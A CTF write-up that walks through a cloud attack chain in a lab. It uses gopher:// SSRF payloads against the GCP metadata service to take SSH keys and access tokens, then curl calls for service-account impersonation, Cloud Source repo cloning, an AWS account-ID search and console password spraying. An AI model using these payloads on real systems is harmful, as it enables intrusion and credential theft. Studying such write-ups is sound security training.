Kabinet's GitBook
Thunderdome 2025
Infiltrate (open the gate)


Last updated 3 months ago

Solve

When clicking refresh, we can see that the web app sends a POST request with a local URL as the feed parameter. This is a classic SSRF vulnerability that we often see in cloud CTFs.

We are also able to get local file read by changing the protocol to file://.

From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the instance metadata, I received an error message saying the request is missing the Metadata-Flavor header.

gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
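The gopher payload above is just a raw HTTP request, percent-encoded so it survives URL parsing. As a minimal sketch (the helper name is mine, and the host, path, and headers mirror the request above), assembling such a payload looks like this:

```python
from urllib.parse import quote

def gopher_http_get(host: str, path: str, headers: dict, port: int = 80) -> str:
    """Build a gopher:// URL that smuggles a raw HTTP/1.1 GET request.

    gopher forwards everything after the one-byte selector ("x" here)
    verbatim to the target port, which lets us inject arbitrary headers
    such as Metadata-Flavor -- something a plain http:// SSRF cannot do.
    """
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    raw = "\r\n".join(lines) + "\r\n\r\n"
    # percent-encode the request so CR/LF and spaces survive the URL parser
    return f"gopher://{host}:{port}/x" + quote(raw, safe="")

url = gopher_http_get(
    "metadata.google.internal",
    "/computeMetadata/v1/instance/attributes/ssh-keys",
    {"Accept": "*/*", "Metadata-Flavor": "Google"},
)
print(url)
```

Feeding the resulting URL into the vulnerable feed parameter reproduces the request above.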

By copying the payload, we are able to list the SSH keys successfully as a proof of concept.

Next, I enumerated the metadata and retrieved the access token for the default service account.

gopher%3A%2F%2Fmetadata%2Egoogle%2Einternal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fservice%2Daccounts%2Fdefault%2Ftoken%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata%2Egoogle%2Einternal%250AAccept%3A%2520%252a%252f%252a%250aMetadata%2DFlavor%3A%2520Google%250d%250a

From here I was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account's permissions. It was not until I DMed an admin for a hint that I was able to progress.

So apparently GCP Brute does not run testIamPermissions against a different service account, and we have to enumerate manually via the APIs.

curl -X POST \
  -H "Authorization: Bearer $at" \
  -H "Content-Type: application/json" \
  --data '{
    "permissions": ["iam.serviceAccounts.getAccessToken"]
  }' \
  "https://iam.googleapis.com/v1/projects/-/serviceAccounts/cloud-source@mp-proj-1-413623.iam.gserviceaccount.com:testIamPermissions"

The cloud-source service account address comes from the enumeration we performed earlier.

Since mp-compute2 is able to get an access token for cloud-source, let's get the access token and enumerate the cloud-source service account's permissions.

curl -X POST \
  -H "Authorization: Bearer $at" \
  -H "Content-Type: application/json" \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/cloud-source@mp-proj-1-413623.iam.gserviceaccount.com:generateAccessToken" \
  -d '{
    "scope": [
      "https://www.googleapis.com/auth/cloud-platform"
    ],
    "lifetime": "3600s"
  }'

With the new access token, let's brute-force the service account's permissions.

From the output, we can see that the service account has permissions over Cloud Source Repositories, which is essentially Google Cloud's version of GitHub.

So let's enumerate Cloud Source. Exporting the access token via the CLOUDSDK_AUTH_ACCESS_TOKEN environment variable lets the gcloud CLI authenticate with it.

Enumerating the Cloud Source repos:

gcloud source repos list

Cloning the repo:

gcloud source repos clone wholesale-distribution

Looking at the code of the cloned repo, it seems to just be static HTML. The only interesting part is that there's a public S3 bucket referenced.

However, while enumerating the public bucket, all the files turned out to be standard libraries, with nothing interesting.

I will not elaborate on the process of setting up the IAM user and policy; you can refer to the linked lab, or find a similar article within the references.

Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-owner header to verify it.

s3-account-search arn:aws:iam::[MY AWS ACCOUNT ID]:role/s3_attacker_role  it-storage-3562577
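Under the hood, s3-account-search assumes the attacker role with a scoped-down session policy whose s3:ResourceAccount condition carries a wildcard (e.g. "97*"): if access to the bucket still succeeds, the real account ID starts with that prefix, so the ID can be recovered one digit at a time. A toy sketch of that search loop with a stubbed-out oracle (a linear digit scan for readability; the actual tool narrows digit ranges more efficiently):

```python
def find_account_id(prefix_allowed, length=12):
    """Recover a 12-digit AWS account ID digit by digit.

    `prefix_allowed(prefix)` is an oracle returning True when access to
    the bucket succeeds under a session policy conditioned on
    s3:ResourceAccount matching "<prefix>*" -- i.e. when the bucket
    owner's account ID starts with `prefix`.
    """
    acct = ""
    for _ in range(length):
        for digit in "0123456789":
            if prefix_allowed(acct + digit):
                acct += digit
                break
        else:
            raise RuntimeError("no digit matched; oracle inconsistent")
    return acct

# stub oracle for illustration: pretend the bucket owner is 975050229156;
# the real oracle would perform sts:AssumeRole + a bucket request
real = "975050229156"
print(find_account_id(lambda p: real.startswith(p)))  # -> 975050229156
```

With a real AWS oracle, each prefix test costs one AssumeRole call plus one S3 request, so the full ID falls out in a few hundred requests at most.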

curl -X GET "https://it-storage-3562577.s3.amazonaws.com" \
-H "x-amz-expected-bucket-owner: 975050229156"

If the Account ID is wrong, we will get an access denied response instead.

Next, I'll be spraying with GoAWSConsoleSpray again, using the username and password wordlists we saved previously. I managed to find credentials for haru with a reused password.

Let's enumerate the recently visited services to see if there's anything interesting.

Looking at Lambda, it looks like we have access to the function haru_test.

Looking at the function's source code, we are able to retrieve the flag.

TLDR

  • Utilize parthaban's credentials to authenticate to the web application

  • Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavor header

  • Use testIamPermissions on getAccessToken against other service accounts to perform lateral movement

  • Lateral movement to cloud-source service account

  • Enumerate Google Cloud Source and download the Repository

  • Utilize s3-account-search to retrieve AWS Account ID

  • Utilize GoAWSConsoleSpray to spray AWS Console with the newly retrieved Account ID

  • Retrieve the flag from AWS Lambda

Reference

However, while doing research, I came across this technique on PayloadsAllTheThings, which uses the gopher protocol to embed a request header.

That's when I recalled a lab that I had done before, which was to extract the Account ID from an S3 bucket and do further enumeration with it.

https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#cloud-ssrf
https://cloud.google.com/compute/docs/metadata/querying-metadata
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md#ssrf-url-for-google-cloud
https://cloud.google.com/source-repositories/docs/
https://pwnedlabs.io/labs/identify-the-aws-account-id-from-a-public-s3-bucket
https://hackingthe.cloud/aws/enumeration/account_id_from_s3_bucket/